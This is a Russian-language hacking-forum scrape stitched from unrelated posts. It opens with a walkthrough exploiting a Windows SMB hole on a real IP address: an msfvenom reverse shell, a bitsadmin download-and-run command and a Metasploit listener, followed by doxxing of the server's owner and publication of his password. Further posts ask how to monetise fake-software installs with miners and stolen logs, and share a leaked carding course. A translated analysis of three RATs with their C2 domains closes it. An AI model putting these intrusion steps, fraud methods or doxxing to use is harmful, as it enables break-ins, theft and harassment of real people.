Нужный нам эксплойт помечен как 42315.py , дабы все было в порядке и не возникло никаких неполадок, , давайте создадим каталог для работы, а после и копируем нужный скрипт в него :
Code:Copy to clipboard
mkdir exploit
cp /usr/share/exploitdb/exploits/windows/remote/42315.py /root/exploit/
На вякий такой случай, перейдем в каталог и проверим наличие скрипта там:
Code:Copy to clipboard
cd exploit
ls
Сейчас мы можем взглянуть на исходный код для получения дополнительной информации об этом конкретном эксплойте. Это довольно длинный файл, поэтому мы можем использовать команду less , чтобы просмотреть его сверху:
Code:Copy to clipboard
less 42315.py
Для этого эксплойта требуется действительный именованный канал (мы скоро доберемся до этого) и действительный набор учетных данных . Это могут быть любые другие учетные данные от пользователя, который входил в систему в прошлом, включая гостевые учетные записи. Эксплойт автоматически обновит нас до привилегированной учетной записи при запуске.
Теперь проверим есть ли на целевом сервере рабочая гостевая учетная запись, это очень важно, ибо в противном случае ничего не получится. Подключимся как Guest посредством стандартного RDP, не забыв врубить VPN.
Операция успешна.
Сейчас мы уже можем отредактировать файл Python и ввести действительные имя пользователя и пароль для использования, выглядеть в нашем случае это будет следующим образом:
Code:Copy to clipboard
Tested on:
- Windows 2016 x64
- Windows 10 Pro Build 10240 x64
- Windows 2012 R2 x64
- Windows 8.1 x64
- Windows 2008 R2 SP1 x64
- Windows 7 SP1 x64
- Windows 2008 SP1 x64
- Windows 2003 R2 SP2 x64
- Windows XP SP2 x64
- Windows 8.1 x86
- Windows 7 SP1 x86
- Windows 2008 SP1 x86
- Windows 2003 SP2 x86
- Windows XP SP3 x86
- Windows 2000 SP4 x86
'''
USERNAME = 'user'
PASSWORD = 'password'
'''
A transaction with empty setup:
- it is allocated from paged pool (same as other transaction types) on Windows 7 and later
- it is allocated from private heap (RtlAllocateHeap()) with no on use it on Windows Vista and earlier
- no lookaside or caching method for allocating it
А теперь и запустим сам скрипт:
Code:Copy to clipboard
python exploit.py
В ответе видим следующее:
Code:Copy to clipboard
exploit.py <ip> [pipe_name]
Переходим ко второму шагу, здесь мы будем искать так называемый именуемый канал. Сейчас минутка объяснений:
Именованные каналы — это способ взаимодействия запущенных процессов друг с другом с минимальными издержками. Каналы обычно отображаются в виде файлов, к которым могут подключаться другие процессы. [В Metasploit](https://null- byte.wonderhowto.com/how-to/metasploit-basics/) есть сканер, который найдет любые именованные каналы на хосте. Потому в окне Метасплоита вводим следующее:
Code:Copy to clipboard
search pipe
Нам нужен pipe_auditor, потому используем его и сразу же просмотрим опции:
Code:Copy to clipboard
use 7
show options
Все, что нам действительно нужно сделать - это указать IP-адрес нашей цели:
Code:Copy to clipboard
set rhosts 91.211.118.87
run
Так-с, далее нам нужно вернуться в первый терминал и запустить питон скрипт:
Code:Copy to clipboard
python exploit.py 91.211.118.87 netlogon
Ответ должен получиться примерно таковым:
![](/proxy.php?image=https%3A%2F%2Flh6.googleusercontent.com%2FvC9gIVBWl_rlJgI-1BA0b-hdeyx7BZ1QiRa3uaUJvv- ZNNNiuTBIX- GFwHiRANXYxT7A-9mAHzSeJondi0s7mJgOcd27adBS1Baw9VTY0-1rCjzkvsd_KZs52pzFFVvhZskzFSAohDVrO2Uh39ZDksE&hash=6fee9f65b96982f262c8a803122e6107)
И как видим из этого, на целевой машине был создан текстовый файл с именем pwned.txt, это очень хороший знак, стало быть мы можем создать там что-то и более зловещее. Поехали.
Нам понадобится полезная нагрузка и способ, с помощью которого эксплойт сможет ее получить и выполнить. Для этого мы можем использовать MSFvenom, чтобы генерировать некоторый шелл-код, а затем и выполнить его обслуживание с нашей машин посредством Apache . В новом терминале используем следующую команду, чтобы сгенерировать полезную нагрузку и сохранить ее в файл с именем sc.exe в корневом каталоге веб-сайта по умолчанию для сервера Apache:
Code:Copy to clipboard
msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp lhost= 91.211.118.87 lport=4321 -e x64/xor -i 5 -f exe -o /var/www/html/sc.exe
Теперь мы можем запустить сервер Apache, чтобы эксплойт мог подключиться к нашей машине с цели, чтобы получить полезную нагрузку:
Code:Copy to clipboard
service apache2 start
Редактирование кода будет немного муторным, но расписывать подробно не буду, все таки не учу никого здесь делать этого, а просто показываю методы. Сперва ищем вот этот фрагмент кода:
![](/proxy.php?image=https%3A%2F%2Flh4.googleusercontent.com%2FeKCHxMzHa7Lxxtczp2EsAZ8Huwz6knaTL5jEpRKORofn32XAKSwaLerOfWO- Su-0UCYR0XklydlXGjbeQTs4FbOnyndvPk_- lsOBzxvs4emsSbtWKyLDYk5M8mfvAJ_1zXaUDGmSb65BKesxCG6MO_s&hash=e3e6fa7f12ae6039d67e57462aef2666)
Здесь мы видим код, отвечающий за подключение к цели и создание текстового
файла. Мы также можем увидеть интересную функцию под названием service_exec()
, которая закомментирована. Эта функция отвечает за подключение к цели и
выдаст команду для копирования ранее созданного текстового файла в новый
текстовый файл с именем pwned_exec.txt на диске C. Мы можем использовать эту
функцию, чтобы получить нашу полезную нагрузку и выполнить ее на цели.
Сначала изменим функцию, заметив все после cmd /c следующей командой:
Code:Copy to clipboard
bitsadmin /transfer pwn /download http://91.211.118.87/sc.exe C:\sc.exe
BITSAdmin (фоновая интеллектуальная служба передачи) — это инструмент
командной строки Windows, используемый для загрузки или скачивания файлов.
Переключатель /transfer инициализирует передачу ( в данном случае с именем pwn
), а /download указывает, что это загрузка. Затем мы вводим имя удаленного
файла (размещенного на нашем компьютере) и имя локального файла после его
передачи.
Затем добавим еще одну функцию service_exec() и заставим ее выполнять только
что переданный файл. Код будет выглядеть так:
Code:Copy to clipboard
service_exec(conn, r'cmd /c /sc.exe')
Собственно на этом все, запустим слушатель в метасплоит:
Code:Copy to clipboard
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 91.211.118.87
run
Он будет прослушивать любые входящие подключения, и если все пойдет гладко, мы получим сеанс Meterpreter после завершения нашего эксплойта. И наконец, у нас должно быть все на месте и готово к работе. Мы можем запустить эксплойт так же, как мы делали ранее в нашем тестовом прогоне, из каталога:
Code:Copy to clipboard
python exploit.py 91.211.118.87 netlogon
Несколько ошибок, но пусть. Глядим на слушатель, и вуаля - у нас полноценный сеанс от лица системы. Проверим это с помощью команды:
Code:Copy to clipboard
sysinfo
На этом этапе я очень долго думал, что же мне лучше сделать - просто удалить сервер или же устроить тотальный деанон нашего вора А? Не долго думая, я решил посмотреть сеансы RDP подключений, прежде сменив пароль от админского аккаунта и подключившись обычным образом.
Просто зайдем в Event Viewer и посмотрим последние подключения. Стабильно каждый день подключался один и тот же айпи. Село Корюковка. Хе-хе. Имея все эти доказательства его спокойно можно засадить на нары, но этого делать я не стану. Все таки охота превратить его в свою пешку и понаблюдать за тем, что же он предпримет.
Так как все логи и данные сервера находятся теперь у меня, мне не составило труда найти папку Setinfo, которая содержит пароли от админских аккаунтов сервера в КС. Его кстати парольчик-то - stepa1989 .
Он подошел и к форумному аккаунту, а там я уже узнал и почту… Ну, а дальше думайте сами к чему приводит желание ставить одинаковые пароли везде. Хе-хе.
Итоги
Начали за здравие, а закончили за упокой. Такой вот выпуск, но его я решил поделить на две части, охотно позабавлюсь с этим Степаном, а теперь… Стоп, это получается у меня появился свой сервер в КС. Хм-м. Пойду играть что-ли. А с вами как обычно был какой-то парень под ником DeathDay (а также бесплатная версия редактора Яш.екзе), и его нелюбовь к обману. Свидимся.
Волшебник Степан. 1989 - 27.08.22.
взято с codeby
Автор DeathDay
Немного посмотрел курс вроде бы не плохо ну лишним в изучении СИ уж точно не
будет
СКАЧАТЬ
Всем привет. В теме инсталлов не силен, но с недавних пор стал в свободное время делать всякие софтины фейковые и прочее и сливать на них траф. Инсталов много, выходят дешево, иногда вообще бесплатно, но как из монетизировать пока не понимаю. Все что пришло в голову - майнеры вшивать и логи продавать, но не вижу в этом перспективы, с логами было бы интересно самому работать. Подкиньте идей пожалуйста)
слитый курс от wwh
ничего интересного, нового тоже, но новичкам просмотреть можно
Содержение:
1. Вводная
2. Шифрование
3. Шифрование -2
4. Введение в безопасность
5. Безопасность и настройка виртуальной машины
6. Карты
7. Дропы, посреды
8. Прогрев шопов
9. Антидетекты
10. Поиск шопов, разбор мерчей
11. Enroll
Hidden content for authorized users.
](https://anonfiles.com/Dek4YbUao5/WWH_13.01.2020_7z)
anonfiles.com
Во этой части я сосредоточусь на трех полезных нагрузках вредоносных программ
и подробно расскажу о том, как они крадут конфиденциальную информацию с
устройства жертвы, как они отправляют данные на свой C2-сервер, подробно о
командах управления, а также о том, что они могут делать с этими элементами
управления. команды.
Затрагиваемые платформы: Microsoft Windows
Затронутые стороны: пользователи Microsoft Windows
Воздействие: Контролирует устройство жертвы и собирает конфиденциальную
информацию.
Уровень серьезности: критический
«Ave Maria» — это RAT (троян удаленного доступа), также известный как WARZONE
RAT. Он предлагает широкий спектр функций, таких как кража конфиденциальной
информации жертвы и удаленное управление зараженным устройством, включая
повышение привилегий, удаленное управление рабочим столом, захват камеры и
многое другое.
Это первая из трех вредоносных программ, которая внедряется во вновь созданный
процесс «aspnet_compiler.exe» на устройстве жертвы и затем запускается.
У Ave Maria есть блок конфигурации, зашифрованный RC4 в разделе «.bss» его структуры PE. Ключ дешифрования и зашифрованные данные находятся вместе в «.bss». Когда вредоносная программа запускается, она сначала расшифровывает блок конфигурации. На рис. 1.1 показаны расшифрованные данные в памяти.
![Рисунок 1.1 – Блок конфигурации, расшифрованный
RC4](/proxy.php?image=https%3A%2F%2Fmarvel-b1-cdn.bc0a.com%2Ff00000000216283%2Fwww.fortinet.com%2Fblog%2Fthreat-
research%2Fphishing-campaign-delivering-fileless-malware-part-
two%2F_jcr_content%2Froot%2Fresponsivegrid%2Fimage.img.png%2F1653606501361%2Fimg1.1.png&hash=6cd01bff4dffd57aec319f46e4546981)
Рисунок 1.1 – Блок конфигурации, расшифрованный RC4
Он содержит не только сервер C2 («mubbibun.duckdns.org») и порт (0x3E7), но и ряд флагов-переключателей, например, добавлять ли себя в группу автозапуска, обходить UAC (контроль учетных записей) или обойти Защитник Windows.
Как только Ave Maria устанавливает соединение с сервером C2, она начинает
контролировать устройство жертвы. Согласно моим исследованиям, трафик между
его клиентом и сервером C2 зашифрован RC4 с постоянным ключом шифрования
«warzone160».
Я объясню, из чего состоит пакет открытого текста, через пакет экземпляра, как
показано ниже.
Code:Copy to clipboard
29 ВВ 66 Е4 70 ЕА 00 00 1Е 00 00 00 00 00 00 00 00
00 FA 07 00 00 00 00 00 00 60 EA 00 00 4D 5A 90 00
Ave Maria предоставляет следующие возможности:
Удаленный VNC (виртуальные сетевые вычисления), удаленная оболочка, проводник
файлов, диспетчер процессов, удаленная веб-камера, диспетчер паролей, revers
SOCS, загрузка и выполнение файла, удаленный кейлоггер, диспетчер HRDP, а
также повышение привилегий.
![Рисунок 1.2 – Отображение функции удаленного
кейлоггера](/proxy.php?image=https%3A%2F%2Fmarvel-b1-cdn.bc0a.com%2Ff00000000216283%2Fwww.fortinet.com%2Fblog%2Fthreat-
research%2Fphishing-campaign-delivering-fileless-malware-part-
two%2F_jcr_content%2Froot%2Fresponsivegrid%2Fimage_215170684.img.png%2F1653606527000%2Fimg1.2.png&hash=266be01258fcb01e180803caa53566b8)
Рисунок 1.2 – Отображение функции удаленного кейлоггера
На рис. 1.2 показана функция (на стороне C2-сервера) онлайнового удаленного
кейлоггера (команда 24H). Здесь вы можете увидеть, что записывается, когда я
открываю браузер Chrome, ввожу «www.fortinet.com» и нажимаю Enter на
устройстве жертвы. Его функция Password Manager предназначена для кражи
учетных данных из группы приложений, перечисленных ниже, включая интернет-
браузеры и почтовые клиенты.
Google Chrome, браузер Epic Privacy, Microsoft Edge, UCBrowser, Tencent
QQBrowser, Opera, Blisk, Chromium, Brave-Browser, Vivaldi, Comodo Dragon,
Torch, Slim, CentBrowser, Microsoft Internet Explorer, Mozilla Firefox,
Microsoft Outlook, Microsoft Messaging, Mozilla Thunderbird, Tencent Foxmail и
другие.
![Рисунок 1.3 – Псевдокод кражи учетных
данных](/proxy.php?image=https%3A%2F%2Fmarvel-b1-cdn.bc0a.com%2Ff00000000216283%2Fwww.fortinet.com%2Fblog%2Fthreat-
research%2Fphishing-campaign-delivering-fileless-malware-part-
two%2F_jcr_content%2Froot%2Fresponsivegrid%2Fimage_825614562.img.png%2F1653667554743%2Ffig-1.3.png&hash=8e12488a4314611c4f617fe242d61591)
Рисунок 1.3 – Псевдокод кражи учетных данных
На рис. 1.3 показан скриншот псевдокода, в котором Ave Maria крадет учетные данные (команда 20H) из определенных файлов для нескольких интернет-браузеров. Он вызывает функцию для шифрования учетных данных RC4 и отправки их на сервер C2.
В Таблице ниже представлено большинство команд управления, которые поддерживает Ave Maria.
Cmd Num| Description
---|---
00H| Ask for basic information of the victim’s device.
02H| List running processes.
04H| Start File Explorer.
06H| Navigate file.
08H| Retrieve a file from Ave Maria home folder (%LocalAppData%\Microsoft
Vision\) on the victim device.
0AH| Delete a file.
0Ch| Kill a process.
0EH| Execute a shell command.
12H| List victim’s camera device information.
14H| Start victim’s camera.
16H| Stop the camera.
18H| Obtain the title of the active program.
1Ah| Uninstall Ave Maria client from the victim’s device.
1Ch| Transfer a file from C2 server to the victim's device.
1EH| Transfer an executable file to the victim’s device and run.
20H| Obtain the credentials of the apps from the victim’s device.
22H| Download a file from a given URL and execute.
24H| Start the online keylogger.
26H| Stop the online keylogger.
28H| Install HRDP Manager on the victim's device.
2AH| Reverse connect to C2 server for HRDP.
30H| Start the Remote VNC.
32H| Stop the Remote VNC
38H| Start reverse sock.
3AH| Execute a specified file on the victim's device.
3CH| Start the offline keylogger.
3EH,40H| Privilege Escalation.
48H| Transfer a file to the victim.
4AH| Retrieve a folder from the victim device.
Второе безфайловое вредоносное ПО, внедренное в «RegAsm.exe», — это «PandorahVNC Rat», представляющее собой коммерческое программное обеспечение. Он был разработан с использованием C#, платформы Microsoft .Net. Он поддерживает функции для кражи учетных данных из некоторых популярных приложений, таких как Chrome, Microsoft Edge, Firefox, Outlook, Foxmail и т. д. Он также поддерживает команды управления для управления устройством жертвы, такие как запуск процесса, захват снимка экрана, управление мышью и клавиатурой жертвы и многое другое.
Когда он запускается, он определяет следующие переменные. Это адрес сервера C2, порт и идентификатор группы, которые будут использоваться при отправке данных на сервер C2.
Code:Copy to clipboard
string str = "vncgoga.duckdns.org"; //C2 server
string str2 = "1338"; // TCP port
string identifier = "3H4RHL"; // Group id
Затем он приступает к извлечению основного модуля из строки в кодировке
base64, которая выполняет все функции PandoraHVNC RAT. Затем он развертывает
основной модуль во вновь созданном процессе «cvtres.exe» (файл из Microsoft
.Net framework), используя процесс очистки. Он пытается найти файл одним из
следующих способов:
"C:\Windows\Microsoft.NET\Framework\v4.0.30319"
"C:\Windows\Microsoft.NET\Framework\v2.0.50727"
Если ему не удается найти файл, он завершает работу без запуска основного
модуля PandoraHVNC RAT. Адрес сервера C2, порт и идентификатор группы будут
переданы новому процессу во время очистки процесса. На рис. 2.1 показан
сегмент кода для выполнения очистки процесса.
![Рисунок 2.1 – Код для выполнения процесса
выдалбливания](/proxy.php?image=https%3A%2F%2Fmarvel-b1-cdn.bc0a.com%2Ff00000000216283%2Fwww.fortinet.com%2Fblog%2Fthreat-
research%2Fphishing-campaign-delivering-fileless-malware-part-
two%2F_jcr_content%2Froot%2Fresponsivegrid%2Fimage_1905207063.img.png%2F1653606590429%2Fimg-2.1.png&hash=35a60926b9d9d32e8efb34ae259f116c)
Рисунок 2.1 – Код для выполнения процесса выдалбливания
Он собирает основную информацию с устройства жертвы и отправляет ее на сервер C2 для регистрации клиента на сервере. Ниже приведены данные такого пакета.
![Рисунок 2.2 – Регистрационный пакет на сервер
C2](/proxy.php?image=https%3A%2F%2Fmarvel-b1-cdn.bc0a.com%2Ff00000000216283%2Fwww.fortinet.com%2Fblog%2Fthreat-
research%2Fphishing-campaign-delivering-fileless-malware-part-
two%2F_jcr_content%2Froot%2Fresponsivegrid%2Fimage_1810134873.img.png%2F1653606612471%2Fimg2.2.png&hash=1d9de5747d9c56649e20dd3ecbb0242e)
Рисунок 2.2 – Регистрационный пакет на сервер C2
Первое 64-битное целое число 0x62 — это полный размер пакета. Последующие
данные запечатываются в сериализованный двоичный объект. Данные 16H («00 01 …
0000») — это своего рода заголовок. Следующий 0x4a — это размер следующих
строк, который представляет собой целое число переменной длины. Последний 0x0b
является флагом закрытия.
Давайте посмотрим на запечатанную строку, которая состоит из номера пакета
(«654321»), идентификатора группы клиентов («3H4RHL»), имени пользователя и
имени компьютера жертвы («Bobs@BOBS-PC»), кода местоположения жертвы ( «США»),
системная информация («Windows 7 Pro»), дата («09.05.2022»), версия клиента
(«3.1») и используется ли какой-либо антивирус («Ложь»).
Как только C2-сервер получает этот пакет, он отображает информацию о жертве в
виде списка, как показано на Рисунке 2.3, «Подключенный клиент».
![Рисунок 2.3 – Интерфейс и функции сервера PandoraHVNC RAT C2](/proxy.php?image=https%3A%2F%2Fmarvel-b1-cdn.bc0a.com%2Ff00000000216283%2Fwww.fortinet.com%2Fblog%2Fthreat- research%2Fphishing-campaign-delivering-fileless-malware-part- two%2F_jcr_content%2Froot%2Fresponsivegrid%2Fimage_1304283375.img.png%2F1653606709611%2Fimg-2.3.png&hash=d3a6af30759da81135e98216979793ee) Рисунок 2.3 – Интерфейс и функции сервера PandoraHVNC RAT C2
Затем хакер может управлять компьютером жертвы, щелкая правой кнопкой мыши клиент и выбирая элементы в меню. Рисунок 2.3 также демонстрирует контекстное меню и функции.
![Рисунок 2.4 – Пакет учетных данных на сервер
C2](/proxy.php?image=https%3A%2F%2Fwww.fortinet.com%2Fblog%2Fthreat-
research%2Fphishing-campaign-delivering-fileless-malware-part-
two%2F_jcr_content%2Froot%2Fresponsivegrid%2Fimage_1850920595.img.gif%2F1653606737239%2Fimg-2.4.gif&hash=678801ab1b2983d36e28463b9e5ce61e)
Рисунок 2.4 – Пакет учетных данных на сервер C2
Рисунок 2.4 — скриншот двух пакетов, первая строка — полученный пакет
управления командами с номером команды «3308». Остальное — это пакет,
отправленный на сервер C2 с номером пакета «3308». За этим следуют украденные
учетные данные жертвы, когда хакер нажимает «Pandora Recovery». Как
упоминалось ранее, два пакета запечатаны в сериализованном двоичном объекте.
Таблица демонстрирует подробности всех команд управления и функций, которые
предоставляет PandoraHVNC RAT.
Cmd Num| Description
---|---
0| Start to capture the screenshot.
1| Abort the screenshot.
2| Simulate mouse left button DOWN.
3| Simulate mouse right button DOWN.
4| Simulate mouse left button UP.
5| Simulate mouse right button UP.
6| Perform mouse double click.
7| Simulate to press a Key.
8| Move the mouse to a given point.
9| Send the data of the system clipboard to its C2 server.
10| Set given data to system clipboard.
11| Start a Chrome browser with specified parameters.
12| Start Mozilla Firefox with specified parameters.
13| Show the StartMenu.
14| Minimize Pandora HVNC Rat.
15| Show Pandora HVNC Rat to the victim.
16| Show a pop-up message to the victim.
17| Set screenshot interval.
18| Set screenshot quality.
19| Set screenshot size.
21| Start Explorer program.
24| Kill the current process.
30| Start Microsoft Edge browser with specified parameters
32| Start Brave browser with specified parameters
50| Call KillMiner() to kill a process.
55| Download a file into %temp% folder as a Miner.
56| Download a file and execute.
444| Start an Opera browser with specified parameters.
555| Restart Outlook.
556| Restart FoxMail.
557| Restart Thunderbird.
666| Kill current Pandora HVNC Rat.
1337| Send Pong packet.
3306| Push data to override the system clipboard.
3307| Obtain the data from the system clipboard.
3308| Obtain credentials and cookies from the victim’s browsers.
4875| Start a CMD program.
4876| Start a PowerShell program.
8585| Start a Chrome browser with a default URL.
8586| Kill all Chrome browsers.
8587| Reset Scale.
8589| Same as 56. Download a file and execute.
Таблица – Список команд управления PandoraHVNC RAT
Третье безфайловое вредоносное ПО, внедренное в «aspnet_compiler.exe», — это «BitRat», которое считается высококачественным и эффективным RAT. Он обеспечивает сбор информации, такой как регистратор буфера обмена, кейлоггер, учетные данные приложений, ведение журнала веб-камеры и запись голоса. Он имеет широкие команды управления для управления устройством жертвы, включая загрузку и выполнение файла, выполнение удаленного управления рабочим столом, управление процессами и службами, обратные носки и многое другое.
BitRat имеет блок конфигурации, зашифрованный аналогично Ave Maria Rat. На рис. 3.1 показан только что расшифрованный блок конфигурации в памяти, где он содержит сервер C2 («maraipasoo[.]duckdns[.]org») и порт (890), идентификатор клиента («f2b8b66873ca913a») и многое другое.
![Рисунок 3.1 – Блок расшифрованной
конфигурации](/proxy.php?image=https%3A%2F%2Fmarvel-b1-cdn.bc0a.com%2Ff00000000216283%2Fwww.fortinet.com%2Fblog%2Fthreat-
research%2Fphishing-campaign-delivering-fileless-malware-part-
two%2F_jcr_content%2Froot%2Fresponsivegrid%2Fimage_1048433008.img.png%2F1653606773643%2Fimg-3.1.png&hash=d746dacd1d25f612bc34525f61abd093)
Рисунок 3.1 – Блок расшифрованной конфигурации
Он переходит к подключению к серверу C2. Затем он использует протокол TLS 1.2 и набор шифров RAS+AES 256 для передачи и шифрования своего пакета. На рис. 3.2 показана модель, которую он использует для кодирования данных в виде простого текста с помощью Base64 и шифрования с помощью AES-256. И, наконец, он отправляет зашифрованные данные на сервер C2 по протоколу TLS 1.2.
![Рисунок 3.2 – Схема того, как пакет преобразуется и отправляется на сервер C2](/proxy.php?image=https%3A%2F%2Fmarvel-b1-cdn.bc0a.com%2Ff00000000216283%2Fwww.fortinet.com%2Fblog%2Fthreat- research%2Fphishing-campaign-delivering-fileless-malware-part- two%2F_jcr_content%2Froot%2Fresponsivegrid%2Fimage_208348313.img.png%2F1653606799997%2Fimg-3.2.png&hash=30a02627156d6e194bcd25f1761e9038)
Рисунок 3.2 – Схема того, как пакет преобразуется и отправляется на сервер C2
Я воспользуюсь моментом, чтобы объяснить, как выглядит пакет с открытым текстом. На рис. 3.3 ниже показан снимок экрана отладчика, когда BitRat собирался закодировать в Base64 открытый текстовый пакет с базовой информацией об устройстве жертвы.
![Рисунок 3.3 – Базовый информационный пакет перед кодировкой Base64](/proxy.php?image=https%3A%2F%2Fmarvel-b1-cdn.bc0a.com%2Ff00000000216283%2Fwww.fortinet.com%2Fblog%2Fthreat- research%2Fphishing-campaign-delivering-fileless-malware-part- two%2F_jcr_content%2Froot%2Fresponsivegrid%2Fimage_1061018551.img.png%2F1653606825462%2Fimg-3.3.png&hash=83d8525b226b5230ed95989a0b5fc2c7)
Рисунок 3.3 – Базовый информационный пакет до кодирования Base64
Пакет состоит из множества частей, разделенных символом «|», включая
идентификатор клиента («f2b8b66873ca913a»), имя пользователя, имя компьютера,
информацию о процессоре, видеокарте, имени системы («Win 7»), время
безотказной работы системы, время простоя системы, Объем ОЗУ, IP-адрес,
является ли пользователь администратором, версия клиента BitRat («1.38») и т.
д. Далее пакет проходит кодировку Base64 и шифрование AES-256, после чего
отправляется на сервер C2.
Как только сервер C2 получает этот пакет, устройство жертвы появляется в его
интерфейсе управления, где хакер может управлять зараженным устройством.
BitRat более мощный, чем AveMariaRAT и PandoraHVNC, потому что он
предоставляет большое количество управляющих команд (172 команды) для
управления устройством жертвы.
На рис. 3.4 показана информационная панель для подключенной жертвы на стороне
сервера C2. Слева находится основная информация об устройстве жертвы, а справа
перечислены некоторые функции.
![Рисунок 3.4 – Панель инструментов и функции, поддерживаемые
BitRat](/proxy.php?image=https%3A%2F%2Fmarvel-b1-cdn.bc0a.com%2Ff00000000216283%2Fwww.fortinet.com%2Fblog%2Fthreat-
research%2Fphishing-campaign-delivering-fileless-malware-part-
two%2F_jcr_content%2Froot%2Fresponsivegrid%2Fimage_1871964280.img.png%2F1653606847742%2Fimg-3.4.png&hash=559d52d0a536c69e0dc1c1af14727b78)
Рисунок 3.4 – Панель инструментов и функции, поддерживаемые BitRat
Помимо функций из панели управления, он также поддерживает следующие функции
из главного контекстного меню:
Хотя BitRat получает пакет управляющих команд, для восстановления пакета с открытым текстом требуется только расшифровка AES-256. Я объясню структуру командного пакета открытого текста на следующем примере:
" ddos_start |MTkyLjE2OC4yMi4xNQ==|3333|1|tcp|tcp|1|0|L3NpdGUucGhwP3g9dmFsMSZ5PXZhbDI="
Каждый командный пакет начинается со строки имени команды и последующих
параметров, разделенных символом «|».
В приведенном выше примере команда просит зараженное устройство начать DDoS-
атаку, где «ddos_start» — это имя команды, «MTkyLjE2OC4yMi4xNQ==» — целевой
IP-адрес в кодировке Base64, «3333» — целевой порт, метод флуда — «tcp». ,
протокол — «tcp», номер потока — «1», размер — «0», а последнее поле — данные.
В самый первый раз BitRat инициализирует связанный список с узлами,
содержащими имя команды и номер команды (например, «ddos_start» для 85H), а
также некоторые флаги. У BitRat есть метод для просмотра этих узлов в поисках
узла, который соответствует имени команды из пакета путем сравнения строк. Имя
команды начинается со смещения +10H узла, а соответствующий номер команды
сохраняется в двойном слове со смещением +28H. Ниже приведен дамп узла
«ddos_start».
Code:Copy to clipboard
Offset+00 A0 2E 30 00 00 71 3E 00 A0 2E 30 00 00 00 00 00 .0..q>. .0.....
Offset+10 64 64 6F 73 5F 73 74 61 72 74 00 00 00 00 00 00 ddos_start......
Offset+20 0A 00 00 00 0F 00 00 00 85 00 00 00 .......…...
BitRat выполняет действие в соответствии с номером команды.
В Таблице перечислены большинство команд управления с краткими описаниями
команд, которые поддерживает BitRat.
Cmd Name| Num| Description
---|---|---
"cli_up"| 00H| Update BitRat client.
"rc"| 01H| Reconnect to the C2 server.
"cli_dc"| 02H| Disconnect to the C2 server.
"cli_un"| 03H| Uninstall BitRat client from the victim's device.
"cli_sleep"| 04H| Put the victim's system into sleep.
"cli_hib"| 05H| Put the victim's system into hibernation.
"cli_log"| 06H| Have the victim's system to log out the current user.
"cli_rs"| 07H| Restart the victim's device.
"cli_off"| 08H| Shutdown the victim's device.
"cli_bsod"| 09H| Make the victim's system crash with a blue screen.
"info"| 0AH| Request for the basic information of the victim's device.
"drives_get"| 0BH| List drivers, like "C:", "D:" and etc.
"files_exec"| 0CH| Execute a file on the victim's disk with given parameters.
"files_delete_normal"| 0FH| Delete a specified file.
"files_delete_secure"| 10H| Delete a specified file with a security way.
"files_rename"| 11H| Rename a file.
"files_new_dir"| 12H| Create a folder.
"files_zip"| 13H| Make a zip archive of a file.
"files_zip_dir"| 14H| Make a zip archive of a folder.
"files_get"| 15H| List files under a specified path.
"files_search"| 16H| Search files by filter string.
"files_search_stop"| 17H| Stop file searching.
"files_download"| 18H| Transfer a file from the victim's device to the C2
server.
"files_upload"| 1AH| Transfer a file from the C2 server onto the victim's
device.
"prc_list"| 1DH| List running processes.
"prc_suspend"| 1EH| Suspend a process with its PID.
"prc_resume"| 1FH| Resume a suspended process with its PID.
"prc_priority"| 20H| Set a process's priority with a given PID.
"prc_kill"| 21H| Kill a process with its PID.
"prc_restart"| 22H| Restart a process.
"srv_list"| 23H| List system services on the victim's device.
"srv_start"| 24H| Start a service.
"srv_control"| 25H| Pause, stop, continue a service.
"wnd_list"| 27H| List all windows being opened on the victim's device.
"wnd_cmd"| 28H| Control a window. such as hide, show, maximize, minimize, etc.
"dlexec"| 2AH| Download and execute an executable file.
"screenlive"| 2CH| Start screen capture.
"screenlive_stop"| 2DH| Stop screen capture.
"screenlive_monitor"| 2EH| Start screenlive monitor.
"screenlive_size"| 2FH| Set screenlive size.
"screenlive_quality"| 30H| Set screenlive quality"
"screenlive_cursor"| 31H| Set screenlive cursor to show or hide.
"screenlive_color"| 32H| Set screenlive color to gray or color.
"screenlive_click"| 35H| Simulate to perform mouse click on screenlive
windows.
"screenlive_move"| 36h| Move screenlive to a given position.
"screen_preview_start"| 38H| Start screen preview.
"screen_preview_stop"| 39H| Stop screen preview.
"monitors_refresh"| 3BH| Refresh monitors.
"webcam_devices"| 3CH| List webcam interfaces.
"webcam_quality"| 3DH| Set webcam quality.
"webcam_start"| 3EH| Start webcam capture.
"webcam_stop"| 3FH| Stop webcam.
"klgoff_list"| 43H| List offline keylogger files.
"klgoff_get"| 44H| Transfer an offline keylogger file.
"klgoff_dl_all"| 45H| Transfer all keylogger files.
"klgoff_del"| 46H| Delete an offline keylogger file.
"klgonlinestart"| 48H| Start the online keylogger.
"klgonlinestop"| 49H| Stop the online keylogger.
"klg_search"| 4AH| Search keywords in keylogger data.
"aud_rec_list"| 4DH| List audio devices.
"shell_start"| 4EH| Start a remote shell on the victim's device.
"shell_stop"| 4FH| Stop the remote shell.
"shell_exec"| 50H| Exeucte a command trhough the remote shell.
"con_list"| 51H| List all processes with network connections.
"crd_logins_data"| 64H| Collect the credentials from apps on the victim's
device.
"crd_logins_req"| 65H| Transfer the collected credentials.
"remotebrowser"| 6DH| Remotely start the victim's default browser invisible.
"remotebrowser_stop"| 6EH| Stop the remote browsers.
"remotebrowser_key"| 6FH| Press a keyboard key on the remote browser.
"remotebrowser_click"| 70H| Click on the remote browser.
"remotebrowser_quality"| 72H| Set the remote browser quality.
"settings"| 78H| Configure the BitRat client.
"soft_list"| 79H| List the installed software on the victim's device.
"soft_uninstall"| 7AH| Uninstall software from the victim's device.
"reg_hkeys_get"| 7EH| Obtain a list of HKEYs (Handles to the Keys) of the
victim's system registry.
"reg_keys_root_get"| 7FH| List the root keys under a HKEY of the system
registry.
"reg_keys_get"| 80H| Navigate a sub-key of the system registry.
"reg_val_edit"| 81H| Add a value into the system registry.
"reg_val_del"| 82H| Delete a value from the system registry.
"reg_key_add"| 83H| Add a sub-key into the system registry.
"reg_key_del"| 84H| Delete a sub-key from the system registry.
"ddos_start"| 85H| Start a DDOS attack from the victim's device.
"ddos_stop"| 86H| Stop the DDOS attack.
"bypass"| 87H| Attempt the UAC bypass using exploit.
"prc_protect"| 88H| Protect a process.
"wd_kill"| 89H| Kill the Windows defender service.
"autoruns_req"| 92H| Collect a list of auto run progress from the system
registry.
"autoruns_data"| 93H| Request the auto run data.
"autoruns_del"| 94H| Delete an auto-run item.
